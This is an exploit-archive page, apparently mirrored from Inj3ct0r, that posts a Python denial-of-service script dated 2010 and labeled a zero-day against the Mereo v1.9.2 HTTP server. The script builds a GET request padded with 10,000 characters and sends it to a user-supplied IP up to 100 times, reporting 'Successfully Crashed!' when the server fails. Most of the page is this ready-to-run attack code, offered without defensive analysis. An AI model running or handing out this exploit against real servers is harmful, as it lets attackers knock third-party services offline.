Home / os / win7

Mereo v1.9.2 Remote HTTP Server Denial Of Service

Posted on 30 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Mereo v1.9.2 Remote HTTP Server Denial Of Service</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================= Mereo v1.9.2 Remote HTTP Server Denial Of Service ================================================= #!/usr/bin/python ########################################################################### # # Title: Mereo v1.9.2 Remote HTTP Server DoS (0day) # By: CwG GeNiuS # Email: cwggenius [at] gmail [dot] com # Tested: XPSP3 # Download: http://www.ohloh.net/p/mereo # ############################################################################ import socket, sys payload =&quot;GET /&quot;; payload+=&quot;X&quot; * 10000; payload+=&quot; HTTP/1.1 &quot;; count = 1; try: while (count &lt; 100): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print (&quot;[*] Connecting to httpdx server.&quot;); s.connect((sys.argv[1], 80)); print (&quot; [*] Sending command. &quot;); s.send(payload); s.close(); count = count+1; print count; except: print &quot;Successfully Crashed!&quot;; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-30]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP